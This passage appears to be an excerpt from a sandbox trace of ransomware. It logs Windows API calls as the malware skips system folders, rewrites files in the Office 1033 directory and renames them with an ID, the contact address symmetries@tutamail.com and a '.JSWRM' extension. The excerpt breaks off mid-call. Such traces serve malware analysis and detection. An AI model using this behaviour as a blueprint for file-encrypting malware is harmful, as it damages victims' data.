office\\root\\office16\\1033\\excel_f_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0113.883] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=114) returned 1 [0113.883] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.883] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209788 [0113.883] ReadFile (in: hFile=0x238, lpBuffer=0x209788, nNumberOfBytesToRead=0x70, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x209788*, lpNumberOfBytesRead=0x345e89c*=0x70, lpOverlapped=0x0) returned 1 [0113.889] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.889] WriteFile (in: hFile=0x238, lpBuffer=0x209788*, nNumberOfBytesToWrite=0x70, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x209788*, lpNumberOfBytesWritten=0x345e898*=0x70, lpOverlapped=0x0) returned 1 [0113.889] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209788 | out: hHeap=0x1e0000) returned 1 [0113.889] CloseHandle (hObject=0x238) returned 1 [0113.889] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0113.889] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0113.889] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0113.889] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0113.889] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0113.889] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0113.889] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0113.889] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0113.889] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0113.889] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0113.889] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0113.890] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0113.890] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0113.890] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0113.890] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\EXCEL_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\excel_f_col.hxk"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\EXCEL_F_COL.HXK.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\excel_f_col.hxk.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0113.890] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0113.891] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0113.891] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0113.891] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x9a05f3c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x9a05f3c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x9a2c10c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x71, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="EXCEL_K_COL.HXK", cAlternateFileName="EXCEL_~2.HXK")) returned 1 [0113.891] lstrcmpiW (lpString1="EXCEL_K_COL.HXK", lpString2=".") returned 1 [0113.891] lstrcmpiW (lpString1="EXCEL_K_COL.HXK", lpString2="..") returned 1 [0113.891] lstrcmpiW (lpString1="EXCEL_K_COL.HXK", lpString2="...") returned 1 [0113.891] lstrcmpiW (lpString1="EXCEL_K_COL.HXK", lpString2="windows") returned -1 [0113.891] lstrcmpiW (lpString1="EXCEL_K_COL.HXK", lpString2="recovery") returned -1 [0113.891] lstrcmpiW (lpString1="EXCEL_K_COL.HXK", lpString2="perflogs") returned -1 [0113.891] lstrcmpiW (lpString1="EXCEL_K_COL.HXK", lpString2="documents and settings") returned 1 [0113.891] lstrcmpiW (lpString1="EXCEL_K_COL.HXK", lpString2="$RECYCLE.BIN") returned 1 [0113.891] lstrcmpiW (lpString1="EXCEL_K_COL.HXK", lpString2="system volume information") returned -1 [0113.891] lstrcmpiW (lpString1="EXCEL_K_COL.HXK", lpString2="msocache") returned -1 [0113.891] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0113.891] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EXCEL_K_COL.HXK", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0113.891] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EXCEL_K_COL.HXK", cchWideChar=15, lpMultiByteStr=0x345ebd8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EXCEL_K_COL.HXK", lpUsedDefaultChar=0x0) returned 15 [0113.891] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0113.891] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0113.891] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EXCEL_K_COL.HXK", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0113.891] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EXCEL_K_COL.HXK", cchWideChar=15, lpMultiByteStr=0x345eba8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EXCEL_K_COL.HXK", lpUsedDefaultChar=0x0) returned 15 [0113.891] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0113.891] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210e68 [0113.891] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0113.891] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0113.891] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0113.891] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0113.891] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\EXCEL_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\excel_k_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0113.892] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=113) returned 1 [0113.892] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.892] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209788 [0113.892] ReadFile (in: hFile=0x238, lpBuffer=0x209788, nNumberOfBytesToRead=0x70, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x209788*, lpNumberOfBytesRead=0x345e89c*=0x70, lpOverlapped=0x0) returned 1 [0113.893] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.893] WriteFile (in: hFile=0x238, lpBuffer=0x209788*, nNumberOfBytesToWrite=0x70, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x209788*, lpNumberOfBytesWritten=0x345e898*=0x70, lpOverlapped=0x0) returned 1 [0113.893] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209788 | out: hHeap=0x1e0000) returned 1 [0113.893] CloseHandle (hObject=0x238) returned 1 [0113.893] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0113.893] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0113.893] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0113.893] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0113.893] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0113.893] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0113.893] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0113.893] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a480 [0113.893] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a480, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0113.893] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a480 | out: hHeap=0x1e0000) returned 1 [0113.893] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0113.893] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0113.893] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0113.893] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0113.894] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\EXCEL_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\excel_k_col.hxk"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\EXCEL_K_COL.HXK.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\excel_k_col.hxk.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0113.894] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0113.895] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0113.895] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0113.895] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf1c1a793, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf1c1a793, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf1c1a793, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x3860, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="EXPTOOWS.DLL", cAlternateFileName="")) returned 1 [0113.895] lstrcmpiW (lpString1="EXPTOOWS.DLL", lpString2=".") returned 1 [0113.895] lstrcmpiW (lpString1="EXPTOOWS.DLL", lpString2="..") returned 1 [0113.895] lstrcmpiW (lpString1="EXPTOOWS.DLL", lpString2="...") returned 1 [0113.895] lstrcmpiW (lpString1="EXPTOOWS.DLL", lpString2="windows") returned -1 [0113.895] lstrcmpiW (lpString1="EXPTOOWS.DLL", lpString2="recovery") returned -1 [0113.895] lstrcmpiW (lpString1="EXPTOOWS.DLL", lpString2="perflogs") returned -1 [0113.895] lstrcmpiW (lpString1="EXPTOOWS.DLL", lpString2="documents and settings") returned 1 [0113.895] lstrcmpiW (lpString1="EXPTOOWS.DLL", lpString2="$RECYCLE.BIN") returned 1 [0113.895] lstrcmpiW (lpString1="EXPTOOWS.DLL", lpString2="system volume information") returned -1 [0113.895] lstrcmpiW (lpString1="EXPTOOWS.DLL", lpString2="msocache") returned -1 [0113.895] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0113.895] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EXPTOOWS.DLL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0113.895] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EXPTOOWS.DLL", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EXPTOOWS.DLL", lpUsedDefaultChar=0x0) returned 12 [0113.895] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0113.895] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0113.895] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EXPTOOWS.DLL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0113.895] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EXPTOOWS.DLL", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EXPTOOWS.DLL", lpUsedDefaultChar=0x0) returned 12 [0113.895] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0113.895] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0113.895] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210e68 | out: hHeap=0x1e0000) returned 1 [0113.895] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x9a2c10c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x9a2c10c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x9a9e866, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x19e00, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="EXPTOOWS.XLA", cAlternateFileName="")) returned 1 [0113.895] lstrcmpiW (lpString1="EXPTOOWS.XLA", lpString2=".") returned 1 [0113.895] lstrcmpiW (lpString1="EXPTOOWS.XLA", lpString2="..") returned 1 [0113.895] lstrcmpiW (lpString1="EXPTOOWS.XLA", lpString2="...") returned 1 [0113.895] lstrcmpiW (lpString1="EXPTOOWS.XLA", lpString2="windows") returned -1 [0113.895] lstrcmpiW (lpString1="EXPTOOWS.XLA", lpString2="recovery") returned -1 [0113.895] lstrcmpiW (lpString1="EXPTOOWS.XLA", lpString2="perflogs") returned -1 [0113.895] lstrcmpiW (lpString1="EXPTOOWS.XLA", lpString2="documents and settings") returned 1 [0113.895] lstrcmpiW (lpString1="EXPTOOWS.XLA", lpString2="$RECYCLE.BIN") returned 1 [0113.895] lstrcmpiW (lpString1="EXPTOOWS.XLA", lpString2="system volume information") returned -1 [0113.896] lstrcmpiW (lpString1="EXPTOOWS.XLA", lpString2="msocache") returned -1 [0113.896] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0113.896] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EXPTOOWS.XLA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0113.896] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EXPTOOWS.XLA", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EXPTOOWS.XLA", lpUsedDefaultChar=0x0) returned 12 [0113.896] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0113.896] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0113.896] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EXPTOOWS.XLA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0113.896] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EXPTOOWS.XLA", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EXPTOOWS.XLA", lpUsedDefaultChar=0x0) returned 12 [0113.896] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0113.896] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0113.896] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0113.896] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0113.896] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0113.896] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0113.896] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\EXPTOOWS.XLA" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\exptoows.xla"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0113.896] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=105984) returned 1 [0113.897] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.897] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x19e00) returned 0x24c1d0 [0113.897] ReadFile (in: hFile=0x238, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x19e00, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x19e00, lpOverlapped=0x0) returned 1 [0113.904] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.904] WriteFile (in: hFile=0x238, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x19e00, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x19e00, lpOverlapped=0x0) returned 1 [0113.905] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0113.906] CloseHandle (hObject=0x238) returned 1 [0113.906] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210e68 [0113.906] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0113.906] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0113.906] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0113.906] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0113.906] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0113.906] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0113.906] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a210 [0113.906] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a210, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0113.906] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a210 | out: hHeap=0x1e0000) returned 1 [0113.906] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0113.906] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0113.906] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0113.906] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0113.906] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0113.906] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0113.906] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\EXPTOOWS.XLA" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\exptoows.xla"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\EXPTOOWS.XLA.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\exptoows.xla.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0113.907] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0113.907] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210e68 | out: hHeap=0x1e0000) returned 1 [0113.907] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0113.907] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1e76730, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x1e76730, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x1e76730, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x154b0, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="FACILITY.VSL", cAlternateFileName="")) returned 1 [0113.907] lstrcmpiW (lpString1="FACILITY.VSL", lpString2=".") returned 1 [0113.907] lstrcmpiW (lpString1="FACILITY.VSL", lpString2="..") returned 1 [0113.907] lstrcmpiW (lpString1="FACILITY.VSL", lpString2="...") returned 1 [0113.907] lstrcmpiW (lpString1="FACILITY.VSL", lpString2="windows") returned -1 [0113.907] lstrcmpiW (lpString1="FACILITY.VSL", lpString2="recovery") returned -1 [0113.908] lstrcmpiW (lpString1="FACILITY.VSL", lpString2="perflogs") returned -1 [0113.908] lstrcmpiW (lpString1="FACILITY.VSL", lpString2="documents and settings") returned 1 [0113.908] lstrcmpiW (lpString1="FACILITY.VSL", lpString2="$RECYCLE.BIN") returned 1 [0113.908] lstrcmpiW (lpString1="FACILITY.VSL", lpString2="system volume information") returned -1 [0113.908] lstrcmpiW (lpString1="FACILITY.VSL", lpString2="msocache") returned -1 [0113.908] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0113.908] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FACILITY.VSL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0113.908] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FACILITY.VSL", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FACILITY.VSL", lpUsedDefaultChar=0x0) returned 12 [0113.908] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0113.908] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0113.908] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FACILITY.VSL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, 